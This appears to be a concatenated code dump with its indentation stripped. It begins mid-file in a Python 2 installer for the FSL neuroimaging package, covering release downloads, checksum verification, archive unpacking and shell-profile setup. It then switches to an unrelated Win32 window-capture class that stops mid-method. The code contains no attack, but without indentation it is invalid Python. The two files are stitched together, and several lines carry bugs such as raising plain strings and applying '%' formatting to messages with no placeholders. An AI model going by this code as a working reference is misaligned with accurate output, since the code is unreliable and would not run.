items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'sources':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'installer':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
else:
# Install package or alias
if line[2] == 'alias':
items = iter(line[4:])
base_dict = dict(zip(items, items))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])] = base_dict
else:
items = iter(line[5:])
base_dict = dict(zip(items, items))
MsgUser.debug(
",".join(
(line[0], line[1], line[2], line[3], line[4])))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])][
str(line[4])] = base_dict
except OpenUrlError, e:
raise ServerFailure(str(e))
MsgUser.debug(a_dict)
return a_dict.freeze()
class InvalidVersion(Exception):
pass
def get_web_version_and_details(
server_url=Settings.mirror,
request_version=None):
if request_version is None:
details = latest_release(server_url)
try:
version = Version(details['version'])
except KeyError:
try:
redirect = details['redirect']
raise DownloadError(
"Installer not supported on this platform."
"Please visit %s for download instructions" % redirect)
except KeyError:
MsgUser.debug(
"Can't find version or redirect - %s" % details)
raise DownloadError(
"Unsupported OS"
)
else:
MsgUser.debug("Requested version %s" % request_version)
releases = get_releases(server_url)
try:
version = Version(request_version)
except ValueError:
raise DownloadError(
"%s doesn't look like a version" % request_version)
if request_version not in releases.keys():
raise DownloadError(
"%s isn't an available version" % request_version)
details = releases[request_version]
return (version, details)
def download_release(
server_url=Settings.mirror, to_temp=False,
request_version=None, skip_verify=False,
keep=False, source_code=False, feeds=False):
(version, details) = get_web_version_and_details(
server_url, request_version)
if request_version is None:
request_version = str(version)
if source_code or feeds:
if source_code:
extra_type = 'sources'
MsgUser.message("Downloading source code")
else:
extra_type = 'feeds'
MsgUser.message("Downloading FEEDS")
try:
releases = get_extra(server_url, extra_type)
except ExtraDownloadError, e:
raise DownloadError(
"Unable to find details for %s" % (extra_type)
)
to_temp = False
try:
details = releases[request_version]
except KeyError:
raise DownloadError(
"%s %s isn't available" % (request_version, extra_type)
)
MsgUser.debug(details)
if to_temp:
try:
(_, local_filename) = temp_file_name(close=True)
except Exception, e:
MsgUser.debug("Error getting temporary file name %s" % (str(e)))
raise DownloadError("Unable to begin download")
else:
local_filename = details['filename']
if os.path.exists(local_filename):
if os.path.isfile(local_filename):
MsgUser.message("%s exists" % (local_filename))
overwrite = Settings.inst_qus.ask_question('overwrite')
if overwrite:
MsgUser.warning(
"Erasing existing file %s" % local_filename)
try:
os.remove(local_filename)
except:
raise DownloadError(
"Unabled to remove local file %s - remove"
" it and try again" % local_filename)
else:
raise DownloadError("Aborting download")
else:
raise DownloadError(
"There is a directory named %s "
"- cannot overwrite" % local_filename)
MsgUser.debug(
"Downloading to file %s "
"(this may take some time)." % (local_filename))
MsgUser.message(
"Downloading...")
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), details['filename']))
download_file(
url=file_url,
localf=local_filename)
if (not skip_verify and
(details['checksum'] !=
file_checksum(local_filename, details['checksum_type']))):
raise DownloadError('Downloaded file fails checksum')
MsgUser.ok("File downloaded")
except DownloadFileError, e:
MsgUser.debug(str(e))
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
raise DownloadError(str(e))
else:
downloaded = True
return (local_filename, version, details)
class DownloadError(Exception):
pass
def shell_config(shell, fsldir, skip_root=False):
MsgUser.debug("Building environment for %s" % (shell))
env_lines = ''
if shell == 'sh' or shell == 'bash':
if skip_root:
env_lines += '''if [ -x /usr/bin/id ]; then
if [ -z "$EUID" ]; then
# ksh and dash doesn't setup the EUID environment var
EUID=`id -u`
fi
fi
if [ "$EUID" != "0" ]; then
'''
env_lines += '''
# FSL Setup
FSLDIR=%s
PATH=${FSLDIR}/bin:${PATH}
export FSLDIR PATH
. ${FSLDIR}/etc/fslconf/fsl.sh
'''
if skip_root:
env_lines += '''fi'''
match = "FSLDIR="
replace = "FSLDIR=%s"
elif shell == 'csh' or shell == 'tcsh':
if skip_root:
env_lines += '''if ( $uid != 0 ) then
'''
env_lines += '''
# FSL Setup
setenv FSLDIR %s
setenv PATH ${FSLDIR}/bin:${PATH}
source ${FSLDIR}/etc/fslconf/fsl.csh
'''
if skip_root:
env_lines += '''
endif'''
match = "setenv FSLDIR"
replace = "setenv FSLDIR %s"
elif shell == 'matlab':
env_lines = '''
% FSL Setup
setenv( 'FSLDIR', '%s' );
fsldir = getenv('FSLDIR');
fsldirmpath = sprintf('%%s/etc/matlab',fsldir);
path(path, fsldirmpath);
clear fsldir fsldirmpath;
'''
match = "setenv( 'FSLDIR',"
replace = "setenv( 'FSLDIR', '%s' );"
else:
raise ValueError("Unknown shell type %s" % shell)
return (env_lines % (fsldir), match, replace % (fsldir))
def get_profile(shell):
home = os.path.expanduser("~")
dotprofile = os.path.join(home, '.profile')
if shell == 'bash':
profile = os.path.join(home, '.bash_profile')
if not os.path.isfile(profile) and os.path.isfile(dotprofile):
profile = dotprofile
elif shell == 'sh':
profile = dotprofile
else:
cshprofile = os.path.join(home, '.cshrc')
if shell == 'csh':
profile = cshprofile
elif shell == 'tcsh':
profile = os.path.join(home, '.tcshrc')
if not os.path.isfile(profile) and os.path.isfile(cshprofile):
profile = cshprofile
else:
raise ValueError("Unsupported shell")
return profile
class FixFslDirError(Exception):
pass
def fix_fsldir(shell, fsldir):
(_, match, replace) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug(
"Editing %s, replacing line beginning:%s with %s." %
(profile, match, replace))
try:
edit_file(profile, line_starts_replace, match, replace, False)
except EditFileError, e:
raise FixFslDirError(str(e))
class AddFslDirError(Exception):
pass
def add_fsldir(shell, fsldir):
(env_lines, _, _) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug("Adding %s to %s" % (env_lines, profile))
try:
add_to_file(profile, env_lines, False)
except AddToFileError, e:
raise AddFslDirError(str(e))
class ConfigureMatlabError(Exception):
pass
class ConfigureMatlabWarn(Exception):
pass
def configure_matlab(fsldir, m_startup='', c_file=True):
'''Setup your startup.m file to enable FSL MATLAB functions to work'''
(mlines, match, replace) = shell_config('matlab', fsldir)
if m_startup == '':
m_startup = os.path.join(
os.path.expanduser('~'), 'matlab', 'startup.m')
if os.path.exists(m_startup):
# Check if already configured
MsgUser.debug("Looking for %s in %s" % (match, m_startup))
if file_contains(m_startup, match):
try:
MsgUser.debug('Updating MATLAB startup file.')
edit_file(
m_startup, line_starts_replace,
match, replace, False)
except EditFileError, e:
raise ConfigureMatlabError(str(e))
else:
MsgUser.debug('Adding FSL settings to MATLAB.')
try:
add_to_file(m_startup, mlines, False)
except AddToFileError, e:
raise ConfigureMatlabError(str(e))
elif c_file:
# No startup.m file found. Create one
try:
MsgUser.debug('No MATLAB startup.m file found, creating one.')
if not os.path.isdir(os.path.dirname(m_startup)):
MsgUser.debug('No MATLAB startup.m file found, creating one.')
os.mkdir(os.path.dirname(m_startup))
create_file(m_startup, mlines, False)
except (OSError, CreateFileError), e:
MsgUser.debug(
'Unable to create ~/matlab folder or startup.m file,'
' cannot configure (%).' % (str(e)))
raise ConfigureMatlabError(
"Unable to create your ~/matlab folder or startup.m, "
"so cannot configure MATLAB for FSL.")
else:
MsgUser.debug('MATLAB may not be installed, doing nothing.')
raise ConfigureMatlabWarn("I can't tell if you have MATLAB installed.")
class SetupEnvironmentError(Exception):
pass
class SetupEnvironmentSkip(Exception):
pass
def setup_system_environment(fsldir):
'''Add a system-wide profile setting up FSL for all users.
Only supported on Redhat/Centos'''
profile_d = '/etc/profile.d'
profile_files = ['fsl.sh', 'fsl.csh']
exceptions = []
skips = []
if os.getuid() != 0:
sudo = True
else:
sudo = False
if os.path.isdir(profile_d):
for profile in profile_files:
pf = profile.split('.')[1]
(lines, match, replace) = shell_config(pf, fsldir)
this_profile = os.path.join(profile_d, profile)
if os.path.exists(this_profile):
# Already has a profile file
# Does it contain an exact match for current FSLDIR?
match = file_contains_1stline(this_profile, replace)
if match != '':
# If there is an fsl.(c)sh then just fix
# the entry for FSLDIR
MsgUser.debug(
"Fixing %s for FSLDIR location." % (this_profile))
try:
edit_file(
this_profile, line_starts_replace,
match, replace, sudo)
except EditFileError, e:
exceptions.append(str(e))
else:
# No need to do anything
MsgUser.debug(
"%s already configured - skipping." %
(this_profile))
skips.append(profile)
else:
# Create the file
try:
create_file(profile, lines, sudo)
except CreateFileError, e:
exceptions.append(str(e))
else:
raise SetupEnvironmentError(
"No system-wide configuration folder found - Skipped")
if exceptions:
raise SetupEnvironmentError(".".join(exceptions))
if skips:
raise SetupEnvironmentSkip(".".join(skips))
def setup_environment(fsldir=None, system=False, with_matlab=False):
'''Setup the user's environment so that their
terminal finds the FSL tools etc.'''
# Check for presence of profile file:
if fsldir is None:
fsldir = get_fsldir()
user_shell = which_shell()
MsgUser.debug("User's shell is %s" % (user_shell))
try:
profile_lines = shell_config(user_shell, fsldir)
profile = get_profile(user_shell)
except ValueError, e:
raise SetupEnvironmentError(str(e))
cfile = False
if not os.path.isfile(profile):
MsgUser.debug("User is missing a shell setup file.")
cfile = True
if cfile:
MsgUser.debug("Creating file %s" % (profile))
try:
create_file(profile, profile_lines, False)
except CreateFileError, e:
raise SetupEnvironmentError(
"Unable to create profile %s" % (profile))
else:
# Check if user already has FSLDIR set
MsgUser.message("Setting up FSL software...")
try:
if file_contains(profile, "FSLDIR"):
MsgUser.debug("Updating FSLDIR entry.")
fix_fsldir(user_shell, fsldir)
else:
MsgUser.debug("Adding FSLDIR entry.")
add_fsldir(user_shell, fsldir)
except (AddFslDirError, FixFslDirError), e:
raise SetupEnvironmentError(
"Unable to update your profile %s"
" with FSL settings" % (profile))
if with_matlab:
MsgUser.debug("Setting up MATLAB")
try:
configure_matlab(fsldir)
except ConfigureMatlabError, e:
MsgUser.debug(str(e))
raise SetupEnvironmentError(str(e))
except ConfigureMatlabWarn, e:
MsgUser.skipped(str(e))
class PostInstallError(Exception):
pass
class InstallArchiveError(Exception):
pass
class UnknownArchiveType(Exception):
pass
def archive_type(archive):
'''Determine file type based on extension and check
that file looks like this file type'''
archive_types = {
'gzip': ('tar', '-z'),
'bzip2': ('tar', '-j'),
'zip': ('zip', ''), }
try:
file_type = run_cmd("file %s" % (archive))
except RunCommandError, e:
raise UnknownArchiveType(str(e))
file_type = file_type.lower()
for f_type in ('gzip', 'bzip2', 'zip', ):
if f_type in file_type:
return archive_types[f_type]
raise UnknownArchiveType(archive)
def post_install(
fsldir, settings, script="post_install.sh", quiet=False,
app_links=False, x11=False):
MsgUser.message("Performing post install tasks")
if is_writeable(fsldir):
as_root = False
elif is_writeable_as_root(fsldir):
as_root = True
else:
raise PostInstallError(
"Unable to write to target folder (%s)" % (fsldir))
install_installer(fsldir)
script_path = os.path.join(fsldir, Settings.post_inst_dir, script)
if x11:
try:
check_X11(settings.x11)
except CheckX11Warning, e:
MsgUser.warning(str(e))
else:
MsgUser.ok("X11 (required for GUIs) found")
if os.path.exists(script_path):
MsgUser.debug("Found post-install script %s" % (script_path))
if not os.access(script_path, os.X_OK):
raise PostInstallError(
"Unable to run post install script %s" % (script_path)
)
script_opts = '-f "%s"' % (fsldir)
if quiet:
script_opts += " -q"
command_line = " ".join((script_path, script_opts))
try:
run_cmd_displayoutput(command_line, as_root=as_root)
except RunCommandError, e:
raise PostInstallError(
"Error running post installation script (error %s)"
" - check the install log" % (str(e))
)
# Work around for mistake in 5.0.10 post setup script
mal = os.path.join(
fsldir, Settings.post_inst_dir,
'make_applications_links.sh')
if (os.path.exists(mal) and
not file_contains(script_path, "make_applications_links.sh")):
MsgUser.debug(
"Work around necessary for missing app link creation")
else:
app_links = False
if app_links:
try:
make_applications_links(fsldir, settings.applications)
except MakeApplicationLinksError, e:
for message in e.app_messages.values():
MsgUser.warning(message)
else:
MsgUser.ok("/Applications links created/updated")
MsgUser.ok("Post installation setup complete")
def install_archive(archive, fsldir=None):
def clean_up_temp():
try:
safe_delete(tempfolder, as_root)
except SafeDeleteError, sd_e:
MsgUser.debug(
"Unable to clean up temporary folder! "
"%s" % (str(sd_e)))
if not os.path.isfile(archive):
raise InstallError("%s isn't a file" % (archive))
if not fsldir:
try:
fsldir = get_fsldir(specified_dir=fsldir, install=True)
except GetFslDirError, e:
raise InstallError(str(e))
MsgUser.debug("Requested install of %s as %s" % (archive, fsldir))
if os.path.exists(fsldir):
# move old one out of way
MsgUser.debug("FSL version already installed")
keep_old = Settings.inst_qus.ask_question('del_old')
else:
keep_old = False
install_d = os.path.dirname(fsldir)
MsgUser.debug("Checking %s is writeable." % (install_d))
if is_writeable(install_d):
as_root = False
elif is_writeable_as_root(install_d):
as_root = True
else:
raise InstallArchiveError(
"Unable to write to target folder (%s), "
"even as a super user." % (install_d))
MsgUser.debug("Does %s require root for deletion? %s" % (
install_d, as_root))
try:
unarchive, ua_option = archive_type(archive)
except UnknownArchiveType, e:
raise InstallArchiveError(str(e))
# Generate a temporary name - eg fsl-<mypid>-date
tempname = '-'.join(('fsl', str(os.getpid()), str(time.time())))
tempfolder = os.path.join(install_d, tempname)
try:
run_cmd_dropstdout("mkdir %s" % (tempfolder), as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError(
"Unable to create folder to install into.")
MsgUser.debug(
"Unpacking %s into folder %s." % (archive, tempfolder))
try:
if unarchive == 'tar':
unpack_cmd = 'tar -C %s -x %s -o -f %s' % (
tempfolder, ua_option, archive)
elif unarchive == 'zip':
MsgUser.debug(
"Calling unzip %s %s" % (ua_option, archive)
)
unpack_cmd = 'unzip %s %s' % (ua_option, archive)
try:
run_cmd_dropstdout(unpack_cmd, as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError("Unable to unpack FSL.")
new_fsl = os.path.join(tempfolder, 'fsl')
if os.path.exists(fsldir):
# move old one out of way
try:
old_version = get_installed_version(fsldir)
except (NotAFslVersion, GetInstalledVersionError), e:
if keep_old:
old_version = Version('0.0.0')
MsgUser.warning(
"The contents of %s doesn't look like an "
"FSL installation! - "
"moving to fsl-0.0.0" % (fsldir))
old_fsl = '-'.join((fsldir, str(old_version)))
if os.path.exists(old_fsl):
MsgUser.debug(
"Looks like there is another copy of the "
"old version of FSL - deleting...")
try:
safe_delete(old_fsl, as_root)
except SafeDeleteError, e:
raise InstallError(
";".join((
"Install location already has a "
"%s - I've tried to delete it but"
" failed" % (old_fsl), str(e))))
if keep_old:
try:
MsgUser.debug(
"Moving %s to %s" % (fsldir, old_fsl))
move(fsldir, old_fsl, as_root)
MsgUser.message(
'''You can find your archived version of FSL in %s.
If you wish to restore it, remove %s and rename %s to %s''' % (
old_fsl, fsldir, old_fsl, fsldir))
except MoveError, mv_e:
# failed to move the old version
MsgUser.debug(
"Failed to move old version "
"- %s" % (str(mv_e)))
raise InstallError(
"Failed to backup old version (%s)" % (str(mv_e)))
else:
MsgUser.debug("Removing existing FSL install")
try:
safe_delete(fsldir, as_root)
MsgUser.debug("Deleted %s." % (fsldir))
except SafeDeleteError, e:
raise InstallError(
"Failed to delete %s - %s." % (fsldir, str(e)))
else:
old_fsl = ''
try:
MsgUser.debug("Moving %s to %s" % (new_fsl, fsldir))
move(new_fsl, fsldir, as_root)
except MoveError, e:
# Unable to move new install into place
MsgUser.debug(
"Move failed - %s." % (str(e)))
raise InstallError(
'Failed to move new version into place.')
except InstallError, e:
clean_up_temp()
raise InstallArchiveError(str(e))
clean_up_temp()
MsgUser.debug("Install complete")
MsgUser.ok("FSL software installed.")
return fsldir
def check_for_updates(url, fsldir, requested_v=None):
# Start an update
MsgUser.message("Looking for new version.")
try:
this_version = get_installed_version(fsldir)
except GetInstalledVersionError, e:
# We can't find an installed version of FSL!
raise InstallError(str(e))
else:
MsgUser.debug("You have version %s" % (this_version))
if not requested_v:
version = Version(latest_release(url)['version'])
else:
try:
version = Version(requested_v)
except NotAFslVersion:
raise InstallError(
"%s doesn't look like a version" % requested_v)
if version > this_version:
# Update Available
if version.major > this_version.major:
# We don't support patching between major
# versions so download a fresh copy
return (UPGRADE, version)
else:
return (UPDATE, version)
else:
return (CURRENT, None)
class MakeApplicationLinksError(Exception):
def __init__(self, *args):
super(MakeApplicationLinksError, self).__init__(*args)
try:
self.app_messages = args[0]
except IndexError:
self.app_messages = []
def make_applications_links(fsldir, apps):
'''Create symlinks in /Applications'''
MsgUser.message("Creating Application links...")
results = {}
for app in apps:
app_location = os.path.join('/Applications', os.path.basename(app))
app_target = os.path.join(fsldir, app)
create_link = True
MsgUser.debug("Looking for existing link %s" % (app_location))
if os.path.lexists(app_location):
MsgUser.debug(
"Is a link: %s; realpath: %s" % (
os.path.islink(app_location),
os.path.realpath(app_location)))
if os.path.islink(app_location):
MsgUser.debug("A link already exists.")
if os.path.realpath(app_location) != app_target:
MsgUser.debug(
"Deleting old (incorrect) link %s" % (app_location))
try:
run_cmd_dropstdout("rm " + app_location, as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to remove broken"
" link to %s (%s)." % (app_target, str(e)))
results[app] = 'Unable to remove broken link to %s' % (
app_target)
create_link = False
else:
MsgUser.debug("Link is correct, skipping.")
create_link = False
else:
MsgUser.debug(
"%s doesn't look like a symlink, "
"so let's not delete it." % (app_location))
results[app] = (
"%s is not a link so hasn't been updated to point at the "
"new FSL install.") % (app_location)
create_link = False
if create_link:
MsgUser.debug('Create a link for %s' % (app))
if os.path.exists(app_target):
try:
run_cmd_dropstdout(
"ln -s %s %s" % (app_target, app_location),
as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to create link to %s (%s)." % (
app_target, str(e)))
results[app] = (
'Unable to create link to %s.') % (app_target)
else:
MsgUser.debug(
'Unable to find application'
' %s to link to.') % (app_target)
if results:
raise MakeApplicationLinksError(results)
class CheckX11Warning(Exception):
pass
def check_X11(x11):
'''Function to find X11 install on Mac OS X and confirm it is compatible.
Advise user to download Xquartz if necessary'''
MsgUser.message(
"Checking for X11 windowing system (required for FSL GUIs).")
xbin = ''
for x in x11['apps']:
if os.path.exists(os.path.join(x11['location'], x)):
xbin = x
if xbin != '':
# Find out what version is installed
x_v_cmd = [
'/usr/bin/mdls', '-name',
'kMDItemVersion', os.path.join(x11['location'], xbin)]
try:
cmd = Popen(x_v_cmd, stdout=PIPE, stderr=STDOUT)
(vstring, _) = cmd.communicate()
except Exception, e:
raise CheckX11Warning(
"Unable to check X11 version (%s)" % (str(e)))
if cmd.returncode:
MsgUser.debug("Error finding the version of X11 (%s)" % (vstring))
# App found, but can't tell version, warn the user
raise CheckX11Warning(
"X11 (required for FSL GUIs) is installed but I"
" can't tell what the version is.")
else:
# Returns:
# kMDItemVersion = "2.3.6"\n
(_, _, version) = vstring.strip().split()
if version.startswith('"'):
version = version[1:-1]
if version in x11['bad_versions']:
raise CheckX11Warning(
"X11 (required for FSL GUIs) is a version that"
" is known to cause problems. We suggest you"
" upgrade to the latest XQuartz release from "
"%s" % (x11['download_url']))
else:
MsgUser.debug(
"X11 found and is not a bad version"
" (%s: %s)." % (xbin, version))
else:
# No X11 found, warn the user
raise CheckX11Warning(
"The FSL GUIs require the X11 window system which I can't"
" find in the usual places. You can download a copy from %s"
" - you will need to install this before the GUIs will"
" function" % (x11['download_url']))
def do_install(options, settings):
MsgUser.message(
shell_colours.bold + settings.title + shell_colours.default)
if options.test_installer:
settings.main_mirror = options.test_installer
this_computer = Host
if not this_computer.supported:
MsgUser.debug("Unsupported host %s %s %s" % (
this_computer.o_s,
this_computer.arch,
this_computer.os_type))
raise InstallError(
"Unsupported host - you could try building from source")
if this_computer.o_s == "linux":
system_environment = True
with_matlab = False
application_links = False
x11 = False
elif this_computer.o_s == "darwin":
system_environment = False
with_matlab = True
application_links = True
x11 = True
else:
MsgUser.debug("Unrecognised OS %s" % (this_computer.o_s))
raise InstallError("Unrecognised OS")
my_uid = os.getuid()
def configure_environment(fsldir, env_all=False, skip=False, matlab=False):
if skip:
return
if env_all:
if system_environment:
# Setup the system-wise environment
try:
setup_system_environment(fsldir)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(
"Failed to configure system-wide profiles "
"with FSL settings: " % (str(e)))
except SetupEnvironmentSkip, e:
MsgUser.skipped(
"Some shells already configured: " % (str(e)))
else:
MsgUser.debug("System-wide profiles setup.")
MsgUser.ok("System-wide FSL configuration complete.")
else:
MsgUser.skipped(
"System-wide profiles not supported on this OS")
elif my_uid != 0:
# Setup the environment for the current user
try:
setup_environment(fsldir, matlab)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(str(e))
else:
MsgUser.ok(
"User profile updated with FSL settings, you will need "
"to log out and back in to use the FSL tools.")
if my_uid != 0:
if options.quiet:
settings.inst_qus.defaults = True
print '''
We may need administrator rights, but you have specified fully automated
mode - you may still be asked for an admin password if required.'''
print '''
To install fully automatedly, either ensure this is running as the root
user (use sudo) or that you can write to the folder you wish to install
FSL in.'''
elif (not options.download and
not options.list_versions and
not options.get_source and
not options.get_feeds):
MsgUser.warning(
'''Some operations of the installer require administative rights,
for example installing into the default folder of /usr/local.
If your account is an 'Administrator' (you have 'sudo' rights)
then you will be prompted for your administrator password
when necessary.''')
if not options.d_dir and options.quiet:
raise InstallError(
"Quiet mode requires you to specify the install location"
" (e.g. /usr/local)")
if not options.quiet:
MsgUser.message(
"When asked a question, the default answer is given in square "
"brackets.\nHit the Enter key to accept this default answer.")
if options.env_only and my_uid != 0:
configure_environment(
get_fsldir(specified_dir=options.d_dir),
options.env_all)
return
if options.archive:
if not options.skipchecksum:
if not options.checksum:
raise InstallError(
"No checksum provided and checking not disabled")
else:
checksummer = globals()[options.checksum_type + 'File']
if options.checksum != checksummer(options.archive):
raise InstallError("FSL archive doesn't match checksum")
else:
MsgUser.ok("FSL Package looks good")
arc_version = archive_version(options.archive)
MsgUser.message(
"Installing FSL software version %s..." % (arc_version))
fsldir = install_archive(
archive=options.archive, fsldir=options.d_dir)
try:
post_install(fsldir=fsldir, settings=settings, quiet=options.quiet)
except PostInstallError, e:
raise InstallError(str(e))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
return
# All the following options require the Internet...
try:
settings.mirror = fastest_mirror(
settings.mirrors, settings.mirrors_file)
except SiteNotResponding, e:
# We can't find the FSL site - possibly the internet is down
raise InstallError(e)
try:
self_update(settings.mirror)
except SelfUpdateError, e:
MsgUser.debug("Self update error: %s" % (str(e)))
MsgUser.warning("Error checking for updates to installer - continuing")
if options.list_versions:
# Download a list of available downloads from the webserver
list_releases(settings.mirror)
return
if options.download:
MsgUser.debug("Attempting to download latest release")
try:
download_release(request_version=options.requestversion,
skip_verify=options.skipchecksum)
except DownloadFileError, e:
raise("Unable to download release %s" % (str(e)))
return
if options.update:
fsldir = get_fsldir()
status, new_v = check_for_updates(settings.mirror, fsldir=fsldir)
if status == UPDATE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('update'):
return
elif status == UPGRADE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('upgrade'):
return
else:
MsgUser.ok("FSL is up-to-date.")
return
if options.get_source:
MsgUser.debug("Attempting to download source")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
source_code=True)
except DownloadFileError, e:
raise("Unable to download source code %s" % (str(e)))
return
if options.get_feeds:
MsgUser.debug("Attempting to download FEEDS")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
feeds=True)
except DownloadFileError, e:
raise("Unable to download FEEDS %s" % (str(e)))
return
try:
fsldir = get_fsldir(specified_dir=options.d_dir, install=True)
if os.path.exists(fsldir):
(version, details) = get_web_version_and_details(
request_version=options.requestversion
)
inst_version = get_installed_version(fsldir)
if inst_version == version:
reinstall = Settings.inst_qus.ask_question('version_match')
if not reinstall:
return
(fname, version, details) = download_release(
to_temp=True,
request_version=options.requestversion,
skip_verify=options.skipchecksum)
if not details['supported']:
MsgUser.debug(
"This OS is not officially supported -"
" you may experience issues"
)
MsgUser.debug(
"Installing %s from %s (details: %s)" % (fname, version, details))
MsgUser.message(
"Installing FSL software version %s..." % (version))
install_archive(
archive=fname, fsldir=fsldir)
try:
safe_delete(fname)
except SafeDeleteError, e:
MsgUser.debug(
"Unable to delete downloaded package %s ; %s" % (
fname, str(e)))
if details['notes']:
MsgUser.message(details['notes'])
try:
post_install(
fsldir=fsldir, settings=settings,
quiet=options.quiet, x11=x11,
app_links=application_links)
except PostInstallError, e:
raise InstallError(str(e))
except DownloadError, e:
MsgUser.debug("Unable to download FSL %s" % (str(e)))
raise InstallError("Unable to download FSL")
except InstallArchiveError, e:
MsgUser.debug("Unable to unpack FSL ; %s" % (str(e)))
raise InstallError("Unable to unpack FSL - %s" % (str(e)))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
if details['notes']:
MsgUser.message(details['notes'])
def parse_options(args):
usage = "usage: %prog [options]"
ver = "%%prog %s" % (version)
parser = OptionParser(usage=usage, version=ver)
parser.add_option("-d", "--dest", dest="d_dir",
help="Install into folder given by DESTDIR - "
"e.g. /usr/local/fsl",
metavar="DESTDIR", action="store",
type="string")
parser.add_option("-e", dest="env_only",
help="Only setup/update your environment",
action="store_true")
parser.add_option("-E", dest="env_all",
help="Setup/update the environment for ALL users",
action="store_true")
parser.add_option("-v", help="Print version number and exit",
action="version")
parser.add_option("-c", "--checkupdate", dest='update',
help="Check for FSL updates -"
" needs an internet connection",
action="store_true")
parser.add_option("-o", "--downloadonly", dest="download",
help=SUPPRESS_HELP,
action="store_true")
advanced_group = OptionGroup(
parser, "Advanced Install Options",
"These are advanced install options")
advanced_group.add_option(
"-l", "--listversions", dest="list_versions",
help="List available versions of FSL",
action="store_true")
advanced_group.add_option(
"-V", "--fslversion", dest="requestversion",
help="Download the specific version FSLVERSION of FSL",
metavar="FSLVERSION", action="store",
type="string")
advanced_group.add_option(
"-s", "--source", dest="get_source",
help="Download source code for FSL",
action="store_true")
advanced_group.add_option(
"-F", "--feeds", dest="get_feeds",
help="Download FEEDS",
action="store_true")
advanced_group.add_option(
"-q", "--quiet", dest='quiet',
help="Silence all messages - useful if scripting install",
action="store_true")
advanced_group.add_option(
"-p", dest="skip_env",
help="Don't setup the environment",
action="store_true")
parser.add_option_group(advanced_group)
debug_group = OptionGroup(
parser, "Debugging Options",
"These are for use if you have a problem running this installer.")
debug_group.add_option(
"-f", "--file", dest="archive",
help=SUPPRESS_HELP,
metavar="ARCHIVEFILE", action="store",
type="string")
debug_group.add_option(
"-C", "--checksum", dest="checksum",
help=SUPPRESS_HELP,
metavar="CHECKSUM", action="store",
type="string")
debug_group.add_option(
"-T", "--checksum-type", dest="checksum_type",
default="sha256",
help=SUPPRESS_HELP,
action="store",
type="string")
debug_group.add_option(
"-M", "--nochecksum", dest="skipchecksum",
help=SUPPRESS_HELP,
action="store_true")
debug_group.add_option(
"-D", dest="verbose",
help="Switch on debug messages",
action="store_true")
debug_group.add_option(
"-G", dest="test_installer",
help=SUPPRESS_HELP,
action="store",
type="string")
debug_group.add_option(
"-w", dest="test_csv",
help=SUPPRESS_HELP,
action="store_true"
)
parser.add_option_group(debug_group)
return parser.parse_args(args)
if __name__ == '__main__':
(options, args) = parse_options(sys.argv[1:])
if options.verbose:
MsgUser.debugOn()
print options
if options.quiet:
MsgUser.quietOn()
if options.test_csv:
HAS_JSON = False
installer_settings = Settings()
try:
do_install(options, installer_settings)
except BadVersion, e:
MsgUser.debug(str(e))
MsgUser.failed("Unable to find requested version!")
sys.exit(1)
except (InstallError, GetFslDirError, GetInstalledVersionError), e:
MsgUser.failed(str(e))
sys.exit(1)
except UnsupportedOs, e:
MsgUser.failed(str(e))
sys.exit(1)
except KeyboardInterrupt, e:
MsgUser.message('')
MsgUser.failed("Install aborted.")
sys.exit(1)
|
windowcapture.py
|
from threading import Lock, Thread
import numpy as np
import win32con
import win32gui
import win32ui
class WindowCapture:
# threading properties
stopped = True
lock = None
screenshot = None
# properties
w = 0
h = 0
hwnd = None
cropped_x = 0
cropped_y = 0
offset_x = 0
offset_y = 0
# constructor
def __init__(self, window_name=None, cut_window=1):
# create a thread lock object
self.lock = Lock()
# find the handle for the window we want to capture.
# if no window name is given, capture the entire screen
if window_name is None:
self.hwnd = win32gui.GetDesktopWindow()
else:
self.hwnd = win32gui.FindWindow(None, window_name)
if not self.hwnd:
raise Exception("Window not found: {}".format(window_name))
# get the window size
window_rect = win32gui.GetWindowRect(self.hwnd)
self.w = window_rect[2] - window_rect[0]
self.h = window_rect[3] - window_rect[1]
# account for the window border and titlebar and cut them off
border_pixels = 8 * cut_window
titlebar_pixels = 30 * cut_window
self.w = self.w - (border_pixels * 2)
self.h = self.h - titlebar_pixels - border_pixels
self.cropped_x = border_pixels
self.cropped_y = titlebar_pixels
# set the cropped coordinates offset so we can translate screenshot
# images into actual screen positions
self.offset_x = window_rect[0] + self.cropped_x
self.offset_y = window_rect[1] + self.cropped_y
def get_screenshot(self):
# get the window image data
wDC = win32gui.GetWindowDC(self.hwnd)
dcObj = win32ui.CreateDCFromHandle(wDC)
cDC = dcObj.CreateCompatibleDC()
dataBitMap = win32ui.CreateBitmap()
dataBitMap.CreateCompatibleBitmap(dcObj, self.w, self.h)
cDC.SelectObject(dataBitMap)
cDC.BitBlt(
(0, 0),
(self.w, self.h),
dcObj,
(self.cropped_x, self.cropped_y),
win32con.SRCCOPY,
)
# convert the raw data into a format opencv can read
# dataBitMap.SaveBitmapFile(cDC, 'debug.bmp')
signedIntsArray = dataBitMap.GetBitmapBits(True)
